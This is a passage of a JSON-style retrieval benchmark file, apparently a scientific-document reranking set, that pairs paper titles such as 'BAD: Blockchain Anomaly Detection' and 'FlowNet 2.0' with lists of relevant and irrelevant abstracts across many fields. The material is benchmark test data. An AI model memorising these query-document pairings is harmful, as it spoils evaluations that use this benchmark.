"text": "A transimpedance amplifier (TIA) has been designed in a 0.35 μm digital CMOS technology for Gigabit Ethernet. It is based on the structure proposed by Mengxiong Li [1]. This paper presents an amplifier which exploits the regulated cascode (RGC) configuration as the input stage with an integrated optical receiver which consists of an integrated photodetector, thus achieving as large effective input transconductance as that of Si Bipolar or GaAs MESFET. The RGC input configuration isolates the input parasitic capacitance including photodiode capacitance from the bandwidth determination better than common-gate TIA. A series inductive peaking is used for enhancing the bandwidth. The proposed TIA has transimpedance gain of 51.56 dBΩ, and 3-dB bandwidth of 6.57 GHz with two inductor between the RGC and source follower for 0.1 pF photodiode capacitance. The proposed TIA has an input courant noise level of about 21.57 pA/Hz0.5 and it consumes DC power of 16 mW from 3.3 V supply voltage.",
"title": ""
},
{
"docid": "2f3a7d341b32adc14985d5e66c42949e",
"text": "To increase efficacy in traditional classroom courses as well as in Massive Open Online Courses (MOOCs), automated systems supporting the instructor are needed. One important problem is to automatically detect students that are going to do poorly in a course early enough to be able to take remedial actions. This paper proposes an algorithm that predicts the final grade of each student in a class. It issues a prediction for each student individually, when the expected accuracy of the prediction is sufficient. The algorithm learns online what is the optimal prediction and time to issue a prediction based on past history of students' performance in a course. We derive demonstrate the performance of our algorithm on a dataset obtained based on the performance of approximately 700 undergraduate students who have taken an introductory digital signal processing over the past 7 years. Using data obtained from a pilot course, our methodology suggests that it is effective to perform early in-class assessments such as quizzes, which result in timely performance prediction for each student, thereby enabling timely interventions by the instructor (at the student or class level) when necessary.",
"title": ""
},
{
"docid": "5d80bf63f19f3aa271c0d16e179c90d6",
"text": "3D meshes are deployed in a wide range of application processes (e.g., transmission, compression, simplification, watermarking and so on) which inevitably introduce geometric distortions that may alter the visual quality of the rendered data. Hence, efficient model-based perceptual metrics, operating on the geometry of the meshes being compared, have been recently introduced to control and predict these visual artifacts. However, since the 3D models are ultimately visualized on 2D screens, it seems legitimate to use images of the models (i.e., snapshots from different viewpoints) to evaluate their visual fidelity. In this work we investigate the use of image metrics to assess the visual quality of 3D models. For this goal, we conduct a wide-ranging study involving several 2D metrics, rendering algorithms, lighting conditions and pooling algorithms, as well as several mean opinion score databases. The collected data allow (1) to determine the best set of parameters to use for this image-based quality assessment approach and (2) to compare this approach to the best performing model-based metrics and determine for which use-case they are respectively adapted. We conclude by exploring several applications that illustrate the benefits of image-based quality assessment.",
"title": ""
},
{
"docid": "f3e9858900dd75c86d106856e63f1ab2",
"text": "In the near future, new storage-class memory (SCM) technologies -- such as phase-change memory and memristors -- will radically change the nature of long-term storage. These devices will be cheap, non-volatile, byte addressable, and near DRAM density and speed. While SCM offers enormous opportunities, profiting from them will require new storage systems specifically designed for SCM's properties.\n This paper presents Echo, a persistent key-value storage system designed to leverage the advantages and address the challenges of SCM. The goals of Echo include high performance for both small and large data objects, recoverability after failure, and scalability on multicore systems. Echo achieves its goals through the use of a two-level memory design targeted for memory systems containing both DRAM and SCM, exploitation of SCM's byte addressability for fine-grained transactions in non-volatile memory, and the use of snapshot isolation for concurrency, consistency, and versioning. Our evaluation demonstrates that Echo's SCM-centric design achieves the durability guarantees of the best disk-based stores with the performance characteristics approaching the best in-memory key-value stores.",
"title": ""
},
{
"docid": "7e6474de31f7d9cdee552a50a09bbeae",
"text": "BACKGROUND Demographics in America are beginning to shift toward an older population, with the number of patients aged 65 years or older numbering approximately 41.4 million in 2011, which represents an increase of 18% since 2000. Within the aging population, the incidence of vocal disorders is estimated to be between 12% and 35%. In a series reported by Davids et al., 25% of patients over age 65 years presenting with a voice complaint were found to have vocal fold atrophy (presbylarynges), where the hallmark physical signs are vocal fold bowing with an increased glottic gap and prominent vocal processes. The epithelial and lamina propria covering of the vocal folds begin to exhibit changes due to aging. In older adults, the collagen of the vocal folds lose their “wicker basket” type of organization, which leads to more disarrayed segments throughout all the layers of the lamina propria, and there is also a loss of hyaluronic acid and elastic fibers. With this loss of the viscoelastic properties and subsequent vocal fold thinning, along with thyroarytenoid muscle atrophy, this leads to the classic bowed membranous vocal fold. Physiologically, these anatomical changes to the vocal folds leads to incomplete glottal closure, air escape, changes in vocal fold tension, altered fundamental frequency, and decreased vocal endurance. Women’s voices will often become lower pitched initially and then gradually higher pitched and shrill, whereas older men’s voices will gradually become more high pitched as the vocal folds lengthen to try and achieve approximation. LITERATURE REVIEW The literature documents that voice therapy is a useful tool in the treatment of presbyphonia and improves voice-related quality of life. The goal of therapy is based on a causal model that suggests targeting the biological basis of the condition—degenerative respiratory and laryngeal changes—as a result of sarcopenia. Specifically, the voice therapy protocol should capitalize on high-intensity phonatory exercises to overload the respiratory and laryngeal system and improve vocal loudness, reduce vocal effort, and increase voice-related quality of life (VRQoL). In a small prospective, randomized, controlled trial, Ziegler et al. demonstrated that patients with vocal atrophy undergoing therapy—phonation resistance training exercise (PhoRTE) or vocal function exercise (VFE)—had a significantly improved VRQoL score preand post-therapy (88.5–95.0, P 5.049 for PhoRTE and 80.8–87.5, P 5.054 for VFE), whereas patients in the nonintervention group saw no improvement (87.5–91.5, P 5.70). Patients in the PhoRTE group exhibited a significant decrease in perceived phonatory effort, but not patients undergoing VFE or no therapy. Injection laryngoplasty (IL), initially developed for restoration of glottic competence in vocal fold paralysis, has also been increasingly used in treatment of the aging voice. A number of materials have been used over the years including Teflon, silicone, fat, Gelfoam, collagen, hyaluronic acid, carboxymethylcellulose, and calcium hydroxylapatite. Some of these are limited by safety or efficacy concerns, and some of them are not long lasting. With the growing use of in-office IL, the ease of use has made this technique more popular because of the ability to avoid general anesthesia in a sometimes already frail patient population. Davids et al. also examined changes in VRQoL scores for patients undergoing IL and demonstrated a significant improvement preand post-therapy (34.8 vs. 22, P<.0001). Due to a small sample size, however, the authors were unable to make any direct comparisons between patients undergoing voice therapy versus IL. Medialization thyroplasty (MT) remains as the otolaryngologist’s permanent technique for addressing the glottal insufficiency found in the aging larynx. In the same fashion as IL, the technique developed as a way to address the paralytic vocal fold and can use either Silastic or Gore-Tex implants. Postma et al. looked at the From the Emory Voice Center, Department of Otolaryngology/ Head and Neck Surgery, Emory University School of Medicine, Atlanta, Georgia, U.S.A. This work was performed at the Emory Voice Center in the Department of Otolaryngology/Head and Neck Surgery at the Emory School of Medicine in Atlanta, Georgia. This work was funded internally by the Emory Voice Center. The authors have no other funding, financial relationships, or conflicts of interest to disclose. Joseph Bradley has worked as a consultant for Merz Aesthetics teaching a vocal fold injection laryngoplasty course. Send correspondence to Michael M. Johns, III, MD, Emory University School of Medicine, 550 Peachtree St. NE, 9th Floor, Suite 4400, Atlanta, GA 30308. E-mail: michael.johns2@emory.edu",
"title": ""
},
{
"docid": "072b6e69c0d0e277bf7fd679f31085f6",
"text": "A strip curl antenna is investigated for obtaining a circularly-polarized (CP) tilted beam. This curl is excited through a strip line (called the excitation line) that connects the curl arm to a coaxial feed line. The antenna structure has the following features: a small circumference not exceeding two wavelengths and a small antenna height of less than 0.42 wavelength. The antenna arm is printed on a dielectric hollow cylinder, leading to a robust structure. The investigation reveals that an external excitation for the curl using a straight line (ST-line) is more effective for generating a tilted beam than an internal excitation. It is found that the axial ratio of the radiation field from the external-excitation curl is improved by transforming the ST-line into a wound line (WD-line). It is also found that a modification to the end area of the WD-line leads to an almost constant input impedance (50 ohms). Note that these results are demonstrated for the Ku-band (from 11.7 GHz to 12.75 GHz, 8.6% bandwidth).",
"title": ""
},
{
"docid": "4c877ad8e2f8393526514b12ff992ca0",
"text": "The squared-field-derivative method for calculating eddy-current (proximity-effect) losses in round-wire or litz-wire transformer and inductor windings is derived. The method is capable of analyzing losses due to two-dimensional and three-dimensional field effects in multiple windings with arbitrary waveforms in each winding. It uses a simple set of numerical magnetostatic field calculations, which require orders of magnitude less computation time than numerical eddy-current solutions, to derive a frequency-independent matrix describing the transformer or inductor. This is combined with a second, independently calculated matrix, based on derivatives of winding currents, to compute total ac loss. Experiments confirm the accuracy of the method.",
"title": ""
}
] | scidocsrr |
05981dbb5109ce73f049329388593e57 | FlowNet 2.0: Evolution of Optical Flow Estimation with Deep Networks | [
{
"docid": "f1deb9134639fb8407d27a350be5b154",
"text": "This work introduces a novel Convolutional Network architecture for the task of human pose estimation. Features are processed across all scales and consolidated to best capture the various spatial relationships associated with the body. We show how repeated bottom-up, top-down processing used in conjunction with intermediate supervision is critical to improving the performance of the network. We refer to the architecture as a ‘stacked hourglass’ network based on the successive steps of pooling and upsampling that are done to produce a final set of estimates. State-of-the-art results are achieved on the FLIC and MPII benchmarks outcompeting all recent methods.",
"title": ""
},
{
"docid": "6960f780dfc491c6cdcbb6c53fd32363",
"text": "We learn to compute optical flow by combining a classical spatial-pyramid formulation with deep learning. This estimates large motions in a coarse-to-fine approach by warping one image of a pair at each pyramid level by the current flow estimate and computing an update to the flow. Instead of the standard minimization of an objective function at each pyramid level, we train one deep network per level to compute the flow update. Unlike the recent FlowNet approach, the networks do not need to deal with large motions, these are dealt with by the pyramid. This has several advantages. First, our Spatial Pyramid Network (SPyNet) is much simpler and 96% smaller than FlowNet in terms of model parameters. This makes it more efficient and appropriate for embedded applications. Second, since the flow at each pyramid level is small (",
"title": ""
},
{
"docid": "eadc50aebc6b9c2fbd16f9ddb3094c00",
"text": "Instance segmentation is the problem of detecting and delineating each distinct object of interest appearing in an image. Current instance segmentation approaches consist of ensembles of modules that are trained independently of each other, thus missing opportunities for joint learning. Here we propose a new instance segmentation paradigm consisting in an end-to-end method that learns how to segment instances sequentially. The model is based on a recurrent neural network that sequentially finds objects and their segmentations one at a time. This net is provided with a spatial memory that keeps track of what pixels have been explained and allows occlusion handling. In order to train the model we designed a principled loss function that accurately represents the properties of the instance segmentation problem. In the experiments carried out, we found that our method outperforms recent approaches on multiple person segmentation, and all state of the art approaches on the Plant Phenotyping dataset for leaf counting.",
"title": ""
}
] | [
{
"docid": "fc12de539644b1b2cf2406708e13e1e0",
"text": "Nonlinear principal component analysis is a novel technique for multivariate data analysis, similar to the well-known method of principal component analysis. NLPCA, like PCA, is used to identify and remove correlations among problem variables as an aid to dimensionality reduction, visualization, and exploratory data analysis. While PCA identifies only linear correlations between variables, NLPCA uncovers both linear and nonlinear correlations, without restriction on the character of the nonlinearities present in the data. NLPCA operates by training a feedforward neural network to perform the identity mapping, where the network inputs are reproduced at the output layer. The network contains an internal “bottleneck” layer (containing fewer nodes than input or output layers), which forces the network to develop a compact representation of the input data, and two additional hidden layers. The NLPCA method is demonstrated using time-dependent, simulated batch reaction data. Results show that NLPCA successfully reduces dimensionality and produces a feature space map resembling the actual distribution of the underlying system parameters.",
"title": ""
},
{
"docid": "ffc239273a5e911dcc59559ef7c2c7f8",
"text": "Human-dominated marine ecosystems are experiencing accelerating loss of populations and species, with largely unknown consequences. We analyzed local experiments, long-term regional time series, and global fisheries data to test how biodiversity loss affects marine ecosystem services across temporal and spatial scales. Overall, rates of resource collapse increased and recovery potential, stability, and water quality decreased exponentially with declining diversity. Restoration of biodiversity, in contrast, increased productivity fourfold and decreased variability by 21%, on average. We conclude that marine biodiversity loss is increasingly impairing the ocean's capacity to provide food, maintain water quality, and recover from perturbations. Yet available data suggest that at this point, these trends are still reversible.",
"title": ""
},
{
"docid": "0f89f98d8db9667e24f23466c2e37d8a",
"text": "With the increase in the elderly, stroke has become a common disease, often leading to motor dysfunction and even permanent disability. Lower-limb rehabilitation robots can help patients to carry out reasonable and effective training to improve the motor function of paralyzed extremity. In this paper, the developments of lower-limb rehabilitation robots in the past decades are reviewed. Specifically, we provide a classification, a comparison, and a design overview of the driving modes, training paradigm, and control strategy of the lower-limb rehabilitation robots in the reviewed literature. A brief review on the gait detection technology of lower-limb rehabilitation robots is also presented. Finally, we discuss the future directions of the lower-limb rehabilitation robots.",
"title": ""
},
{
"docid": "c3fcc103374906a1ba21658c5add67fe",
"text": "Behavioural scoring models are generally used to estimate the probability that a customer of a financial institution who owns a credit product will default on this product in a fixed time horizon. However, one single customer usually purchases many credit products from an institution while behavioural scoring models generally treat each of these products independently. In order to make credit risk management easier and more efficient, it is interesting to develop customer default scoring models. These models estimate the probability that a customer of a certain financial institution will have credit issues with at least one product in a fixed time horizon. In this study, three strategies to develop customer default scoring models are described. One of the strategies is regularly utilized by financial institutions and the other two will be proposed herein. The performance of these strategies is compared by means of an actual data bank supplied by a financial institution and a Monte Carlo simulation study. Journal of the Operational Research Society advance online publication, 20 April 2016; doi:10.1057/jors.2016.23",
"title": ""
},
{
"docid": "55c4f9f95067ce80bee9a51196f27e85",
"text": "Resilient localization and navigation for autonomous Unmanned Aerial Vehicles (UAVs) still remains a challenge in certain scenarios, like GPS-deprived environments such as indoors or urban canyons. In this work, we explore a heterogeneous UAV swarm design, in which a small number of sensor and computationally powerful UAVs collaborate with the remaining resource-constrained UAVs to guarantee optimal localization accuracy.",
"title": ""
},
{
"docid": "85db35ffe69ce2a8d042c8c068ddaf15",
"text": "Conventional views on marriage migration consider it primarily family-related, and portray female marriage migrants as mostly passive, tied movers. Marriage as an economic strategy is seldom studied. We argue that a structural framework enables analysis of the complexities underlying female marriage migration, stressing institutional, economic, and sociocultural factors that impose constraints on and provide opportunities for women’s mobility. A review of the historical and social roles of marriage in China shows that its transactional nature undermines women’s status but offers disadvantaged women an opportunity to achieve social and economic mobility. Based on statistical analyses of a one-percent sample of China’s 1990 Census, we show that peasant women in poor areas are constrained by their institutional positions, rural origins, and low education and status, shutting them out from cities and the urban labor market. Yet in the face of these constraints, many women, in exchange for economic opportunities and agricultural work, pursue migration by marrying into rural areas in more developed regions and by moving over long distances. These rural brides in well-defined migration streams are testimony to the roles of social and kinship networks and of brokers in the marriage market. Men who are socially and/or economically disadvantaged but locationally privileged are able to draw brides from afar. Despite the neoclassical overtone of the notion that marriage migration is an economic strategy, we argue that a structural approach is necessary for understanding the complexities underlying female migration and for explaining the recent phenomenon of long-distance female marriage migration in China.",
"title": ""
},
{
"docid": "281fe7b4b26ead35e7ce0d2ea354f002",
"text": "BACKGROUND\nThe safety and the effects of different trajectories on thumb motion of suture-button suspensionplasty post-trapeziectomy are not known.\n\n\nMETHODS\nIn a cadaveric model, thumb range of motion, trapeziectomy space height, and distance between the device and nerve to the first dorsal interosseous muscle (first DI) were measured for proximal and distal trajectory groups. Proximal trajectory was defined as a suture button angle directed from the thumb metacarpal to the second metacarpal at a trajectory less than 60° from the horizontal; distal trajectory was defined as a suture button angle directed from the thumb metacarpal to the second metacarpal at a trajectory of greater than 60° from the horizontal (Fig. 1).\n\n\nRESULTS\nThere were no significant differences in range of motion and trapeziectomy space height between both groups. The device was significantly further away from the nerve to the first DI in the proximal trajectory group compared to the distal trajectory group, but was still safely away from the nerve in both groups (greater than 1 cm).\n\n\nCONCLUSIONS\nThese results suggest that the device placement in either a proximal or distal location on the second metacarpal will yield similar results regarding safety and thumb range of motion.",
"title": ""
},
{
"docid": "146746c73471d0a4222267e819c79e85",
"text": "Distributed Generation has become a consolidated phenomenon in distribution grids in the last few years. Even though the matter is very articulated and complex, islanding operation of distribution grid is being considered as a possible measure to improve service continuity. In this paper a novel static converter control strategy to obtain frequency and voltage regulation in islanded distribution grid is proposed. Two situations are investigated: in the former one electronic converter and one synchronous generator are present, while in the latter only static generation is available. In both cases, converters are supposed to be powered by DC micro-grids comprising of generation and storage devices. In the first case converter control will realize virtual inertia and efficient frequency regulation by mean of PID regulator; this approach allows to emulate a very high equivalent inertia and to obtain fast frequency regulation, which could not be possible with traditional regulators. In the second situation a Master-Slave approach will be adopted to maximize frequency and voltage stability. Simulation results confirm that the proposed control allows islanded operation with high frequency and voltage stability under heavy load variations.",
"title": ""
},
{
"docid": "667397dd9d08d01d0076e54cb719b942",
"text": "It is known that secure multi-party computations can be achieved using a number of black and red physical cards (with identical backs). In previous studies on such card-based cryptographic protocols, typically an ideal situation where all players are semi-honest and all cards of the same suit are indistinguishable from one another was assumed. In this paper, we consider more realistic situations where, for example, some players possibly act maliciously, or some cards possibly have scuff marks, so that they are distinguishable, and propose methods to maintain the secrecy of players’ private inputs even under such severe conditions.",
"title": ""
},
{
"docid": "0edc89fbf770bbab2fb4d882a589c161",
"text": "A calculus is developed in this paper (Part I) and the sequel (Part 11) for obtaining bounds on delay and buffering requirements in a communication network operating in a packet switched mode under a fixed routing strategy. The theory we develop is different from traditional approaches to analyzing delay because the model we use to describe the entry of data into the network is nonprobabilistic: We suppose that the data stream entered intq the network by any given user satisfies “burstiness constraints.” A data stream is said to satisfy a burstiness constraint if the quantity of data from the stream contained in any interval of time is less than a value that depends on the length of the interval. Several network elements are defined that can be used as building blocks to model a wide variety of communication networks. Each type of network element is analyzed by assuming that the traffic entering it satisfies burstiness constraints. Under this assumption bounds are obtained on delay and buffering requirements for the network element, burstiness constraints satisfied by the traffic that exits the element are derived. Index Terms -Queueing networks, burstiness, flow control, packet switching, high speed networks.",
"title": ""
},
{
"docid": "792767dee5fb0251f0ff028c75d6e55a",
"text": "According to a recent theory, anterior cingulate cortex is sensitive to response conflict, the coactivation of mutually incompatible responses. The present research develops this theory to provide a new account of the error-related negativity (ERN), a scalp potential observed following errors. Connectionist simulations of response conflict in an attentional task demonstrated that the ERN--its timing and sensitivity to task parameters--can be explained in terms of the conflict theory. A new experiment confirmed predictions of this theory regarding the ERN and a second scalp potential, the N2, that is proposed to reflect conflict monitoring on correct response trials. Further analysis of the simulation data indicated that errors can be detected reliably on the basis of post-error conflict. It is concluded that the ERN can be explained in terms of response conflict and that monitoring for conflict may provide a simple mechanism for detecting errors.",
"title": ""
},
{
"docid": "ea5a455bca9ff0dbb1996bd97d89dfe5",
"text": "Single exon genes (SEG) are archetypical of prokaryotes. Hence, their presence in intron-rich, multi-cellular eukaryotic genomes is perplexing. Consequently, a study on SEG origin and evolution is important. Towards this goal, we took the first initiative of identifying and counting SEG in nine completely sequenced eukaryotic organisms--four of which are unicellular (E. cuniculi, S. cerevisiae, S. pombe, P. falciparum) and five of which are multi-cellular (C. elegans, A. thaliana, D. melanogaster, M. musculus, H. sapiens). This exercise enabled us to compare their proportion in unicellular and multi-cellular genomes. The comparison suggests that the SEG fraction decreases with gene count (r = -0.80) and increases with gene density (r = 0.88) in these genomes. We also examined the distribution patterns of their protein lengths in different genomes.",
"title": ""
},
{
"docid": "425fb8419a81531e9f5ce3da96155d93",
"text": "This paper presents the challenges that researchers must overcome in traffic light recognition (TLR) research and provides an overview of ongoing work. The aim is to elucidate which areas have been thoroughly researched and which have not, thereby uncovering opportunities for further improvement. An overview of the applied methods and noteworthy contributions from a wide range of recent papers is presented, along with the corresponding evaluation results. The evaluation of TLR systems is studied and discussed in depth, and we propose a common evaluation procedure, which will strengthen evaluation and ease comparison. To provide a shared basis for comparing TLR systems, we publish an extensive public data set based on footage from U.S. roads. The data set contains annotated video sequences, captured under varying light and weather conditions using a stereo camera. The data set, with its variety, size, and continuous sequences, should challenge current and future TLR systems.",
"title": ""
},
{
"docid": "19b537f7356da81830c8f7908af83669",
"text": "Investigation of the hippocampus has historically focused on computations within the trisynaptic circuit. However, discovery of important anatomical and functional variability along its long axis has inspired recent proposals of long-axis functional specialization in both the animal and human literatures. Here, we review and evaluate these proposals. We suggest that various long-axis specializations arise out of differences between the anterior (aHPC) and posterior hippocampus (pHPC) in large-scale network connectivity, the organization of entorhinal grid cells, and subfield compositions that bias the aHPC and pHPC towards pattern completion and separation, respectively. The latter two differences give rise to a property, reflected in the expression of multiple other functional specializations, of coarse, global representations in anterior hippocampus and fine-grained, local representations in posterior hippocampus.",
"title": ""
},
{
"docid": "aeec3b7e79225355a5a6ff10f9c3e4ea",
"text": "BACKGROUND\nCritically ill patients frequently suffer muscle weakness whilst in critical care. Ultrasound can reliably track loss of muscle size, but also quantifies the arrangement of the muscle fascicles, known as the muscle architecture. We sought to measure both pennation angle and fascicle length, as well as tracking changes in muscle thickness in a population of critically ill patients.\n\n\nMETHODS\nOn days 1, 5 and 10 after admission to critical care, muscle thickness was measured in ventilated critically ill patients using bedside ultrasound. Elbow flexor compartment, medial head of gastrocnemius and vastus lateralis muscle were investigated. In the lower limb, we determined the pennation angle to derive the fascicle length.\n\n\nRESULTS\nWe recruited and scanned 22 patients on day 1 after admission to critical care, 16 were re-scanned on day 5 and 9 on day 10. We found no changes to the size of the elbow flexor compartment over 10 days of admission. In the gastrocnemius, there were no significant changes to muscle thickness or pennation angle over 5 or 10 days. In the vastus lateralis, we found significant losses in both muscle thickness and pennation angle on day 5, but found that fascicle length is unchanged. Loss of muscle on day 5 was related to decreases in pennation angle. In both lower limb muscles, a positive relationship was observed between the pennation angle on day 1, and the percentage of angle lost by days 5 and 10.\n\n\nDISCUSSION\nMuscle loss in critically ill patients preferentially affects the lower limb, possibly due to the lower limb becoming prone to disuse atrophy. Muscle architecture of the thigh changes in the first 5 days of admission, in particular, we have demonstrated a correlation between muscle thickness and pennation angle. It is hypothesised that weakness in the lower limb occurs through loss of force generation via a reduced pennation angle.\n\n\nCONCLUSION\nUsing ultrasound, we have been able to demonstrate that muscle thickness and architecture of vastus lateralis undergo rapid changes during the early phase of admission to a critical care environment.",
"title": ""
},
{
"docid": "fe38b44457f89bcb63aabe65babccd03",
"text": "Single sample face recognition have become an important problem because of the limitations on the availability of gallery images. In many real-world applications such as passport or driver license identification, there is only a single facial image per subject available. The variations between the single gallery face image and the probe face images, captured in unconstrained environments, make the single sample face recognition even more difficult. In this paper, we present a fully automatic face recognition system robust to most common face variations in unconstrained environments. Our proposed system is capable of recognizing faces from non-frontal views and under different illumination conditions using only a single gallery sample for each subject. It normalizes the face images for both in-plane and out-of-plane pose variations using an enhanced technique based on active appearance models (AAMs). We improve the performance of AAM fitting, not only by training it with in-the-wild images and using a powerful optimization technique, but also by initializing the AAM with estimates of the locations of the facial landmarks obtained by a method based on flexible mixture of parts. The proposed initialization technique results in significant improvement of AAM fitting to non-frontal poses and makes the normalization process robust, fast and reliable. Owing to the proper alignment of the face images, made possible by this approach, we can use local feature descriptors, such as Histograms of Oriented Gradients (HOG), for matching. The use of HOG features makes the system robust against illumination variations. In order to improve the discriminating information content of the feature vectors, we also extract Gabor features from the normalized face images and fuse them with HOG features using Canonical Correlation Analysis (CCA). Experimental results performed on various databases outperform the state-of-the-art methods and show the effectiveness of our proposed method in normalization and recognition of face images obtained in unconstrained environments.",
"title": ""
},
{
"docid": "abf3e75c6f714e4c2e2a02f9dd00117b",
"text": "Recent work has shown that collaborative filter-based recommender systems can be improved by incorporating side information, such as natural language reviews, as a way of regularizing the derived product representations. Motivated by the success of this approach, we introduce two different models of reviews and study their effect on collaborative filtering performance. While the previous state-of-the-art approach is based on a latent Dirichlet allocation (LDA) model of reviews, the models we explore are neural network based: a bag-of-words product-of-experts model and a recurrent neural network. We demonstrate that the increased flexibility offered by the product-of-experts model allowed it to achieve state-of-the-art performance on the Amazon review dataset, outperforming the LDA-based approach. However, interestingly, the greater modeling power offered by the recurrent neural network appears to undermine the model's ability to act as a regularizer of the product representations.",
"title": ""
},
{
"docid": "488b0adfe43fc4dbd9412d57284fc856",
"text": "We describe the results of an experiment in which several conventional programming languages, together with the functional language Haskell, were used to prototype a Naval Surface Warfare Center (NSWC) requirement for a Geometric Region Server. The resulting programs and development metrics were reviewed by a committee chosen by the Navy. The results indicate that the Haskell prototype took significantly less time to develop and was considerably more concise and easier to understand than the corresponding prototypes written in several different imperative languages, including Ada and C++. ∗This work was supported by the Advanced Research Project Agency and the Office of Naval Research under Arpa Order 8888, Contract N00014-92-C-0153.",
"title": ""
},
{
"docid": "6eca7ba1607a1d7d6697af6127a92c4b",
"text": "Cluster analysis is one of attractive data mining technique that use in many fields. One popular class of data clustering algorithms is the center based clustering algorithm. K-means used as a popular clustering method due to its simplicity and high speed in clustering large datasets. However, K-means has two shortcomings: dependency on the initial state and convergence to local optima and global solutions of large problems cannot found with reasonable amount of computation effort. In order to overcome local optima problem lots of studies done in clustering. Over the last decade, modeling the behavior of social insects, such as ants and bees, for the purpose of search and problem solving has been the context of the emerging area of swarm intelligence. Honey-bees are among the most closely studied social insects. Honey-bee mating may also be considered as a typical swarm-based approach to optimization, in which the search algorithm is inspired by the process of marriage in real honey-bee. Honey-bee has been used to model agent-based systems. In this paper, we proposed application of honeybee mating optimization in clustering (HBMK-means). We compared HBMK-means with other heuristics algorithm in clustering, such as GA, SA, TS, and ACO, by implementing them on several well-known datasets. Our finding shows that the proposed algorithm works than the best one. 2007 Elsevier Inc. All rights reserved.",
"title": ""
}
] | scidocsrr |
90908c9174132b56d8f124ff915a3068 | BAD: Blockchain Anomaly Detection | [
{
"docid": "79798f4fbe3cffdf7c90cc5349bf0531",
"text": "When a software system starts behaving abnormally during normal operations, system administrators resort to the use of logs, execution traces, and system scanners (e.g., anti-malwares, intrusion detectors, etc.) to diagnose the cause of the anomaly. However, the unpredictable context in which the system runs and daily emergence of new software threats makes it extremely challenging to diagnose anomalies using current tools. Host-based anomaly detection techniques can facilitate the diagnosis of unknown anomalies but there is no common platform with the implementation of such techniques. In this paper, we propose an automated anomaly detection framework (Total ADS) that automatically trains different anomaly detection techniques on a normal trace stream from a software system, raise anomalous alarms on suspicious behaviour in streams of trace data, and uses visualization to facilitate the analysis of the cause of the anomalies. Total ADS is an extensible Eclipse-based open source framework that employs a common trace format to use different types of traces, a common interface to adapt to a variety of anomaly detection techniques (e.g., HMM, sequence matching, etc.). Our case study on a modern Linux server shows that Total ADS automatically detects attacks on the server, shows anomalous paths in traces, and provides forensic insights.",
"title": ""
},
{
"docid": "7e75bbbf5e86edc396aaa9d9db02c509",
"text": "Background: In recent years, blockchain technology has attracted considerable attention. It records cryptographic transactions in a public ledger that is difficult to alter and compromise because of the distributed consensus. As a result, blockchain is believed to resist fraud and hacking. Results: This work explores the types of fraud and malicious activities that can be prevented by blockchain technology and identifies attacks to which blockchain remains vulnerable. Conclusions: This study recommends appropriate defensive measures and calls for further research into the techniques for fighting malicious activities related to blockchains.",
"title": ""
},
{
"docid": "44a84af55421c88347034d6dc14e4e30",
"text": "Anomaly detection plays an important role in protecting computer systems from unforeseen attack by automatically recognizing and filter atypical inputs. However, it can be difficult to balance the sensitivity of a detector – an aggressive system can filter too many benign inputs while a conservative system can fail to catch anomalies. Accordingly, it is important to rigorously test anomaly detectors to evaluate potential error rates before deployment. However, principled systems for doing so have not been studied – testing is typically ad hoc, making it difficult to reproduce results or formally compare detectors. To address this issue we present a technique and implemented system, Fortuna, for obtaining probabilistic bounds on false positive rates for anomaly detectors that process Internet data. Using a probability distribution based on PageRank and an efficient algorithm to draw samples from the distribution, Fortuna computes an estimated false positive rate and a probabilistic bound on the estimate’s accuracy. By drawing test samples from a well defined distribution that correlates well with data seen in practice, Fortuna improves on ad hoc methods for estimating false positive rate, giving bounds that are reproducible, comparable across different anomaly detectors, and theoretically sound. Experimental evaluations of three anomaly detectors (SIFT, SOAP, and JSAND) show that Fortuna is efficient enough to use in practice — it can sample enough inputs to obtain tight false positive rate bounds in less than 10 hours for all three detectors. These results indicate that Fortuna can, in practice, help place anomaly detection on a stronger theoretical foundation and help practitioners better understand the behavior and consequences of the anomaly detectors that they deploy. As part of our work, we obtain a theoretical result that may be of independent interest: We give a simple analysis of the convergence rate of the random surfer process defining PageRank that guarantees the same rate as the standard, second-eigenvalue analysis, but does not rely on any assumptions about the link structure of the web.",
"title": ""
}
] | [
{
"docid": "c491e39bbfb38f256e770d730a50b2e1",
"text": "Monte Carlo integration is firmly established as the basis for most practical realistic image synthesis algorithms because of its flexibility and generality. However, the visual quality of rendered images often suffers from estimator variance, which appears as visually distracting noise. Adaptive sampling and reconstruction algorithms reduce variance by controlling the sampling density and aggregating samples in a reconstruction step, possibly over large image regions. In this paper we survey recent advances in this area. We distinguish between “a priori” methods that analyze the light transport equations and derive sampling rates and reconstruction filters from this analysis, and “a posteriori” methods that apply statistical techniques to sets of samples to drive the adaptive sampling and reconstruction process. They typically estimate the errors of several reconstruction filters, and select the best filter locally to minimize error. We discuss advantages and disadvantages of recent state-of-the-art techniques, and provide visual and quantitative comparisons. Some of these techniques are proving useful in real-world applications, and we aim to provide an overview for practitioners and researchers to assess these approaches. In addition, we discuss directions for potential further improvements.",
"title": ""
},
{
"docid": "8e6efa696b960cf08cf1616efc123cbd",
"text": "SLAM (Simultaneous Localization and Mapping) for underwater vehicles is a challenging research topic due to the limitations of underwater localization sensors and error accumulation over long-term operations. Furthermore, acoustic sensors for mapping often provide noisy and distorted images or low-resolution ranging, while video images provide highly detailed images but are often limited due to turbidity and lighting. This paper presents a review of the approaches used in state-of-the-art SLAM techniques: Extended Kalman Filter SLAM (EKF-SLAM), FastSLAM, GraphSLAM and its application in underwater environments.",
"title": ""
},
{
"docid": "da93678f1b1070d68cfcbc9b7f6f88fe",
"text": "Dermal fat grafts have been utilized in plastic surgery for both reconstructive and aesthetic purposes of the face, breast, and body. There are multiple reports in the literature on the male phallus augmentation with the use of dermal fat grafts. Few reports describe female genitalia aesthetic surgery, in particular rejuvenation of the labia majora. In this report we describe an indication and use of autologous dermal fat graft for labia majora augmentation in a patient with loss of tone and volume in the labia majora. We found that this procedure is an option for labia majora augmentation and provides a stable result in volume-restoration.",
"title": ""
},
{
"docid": "b9b08d97b084d0b73f7aba409dbda67c",
"text": "This paper presents a 1V low-voltage high speed frequency divider-by-2 which is fabricated in a standard 0.18μm TSMC RF CMOS process. Employing parallel current switching topology, the 2:1 frequency divider operates up to 6.5GHz while consuming 4.64mA current with test buffers at a supply voltage of 1V, and the chip area of the core circuit is 0.065×0.055mm2.",
"title": ""
},
{
"docid": "66d24e13c8ac0dc5c0e85b3e2873346c",
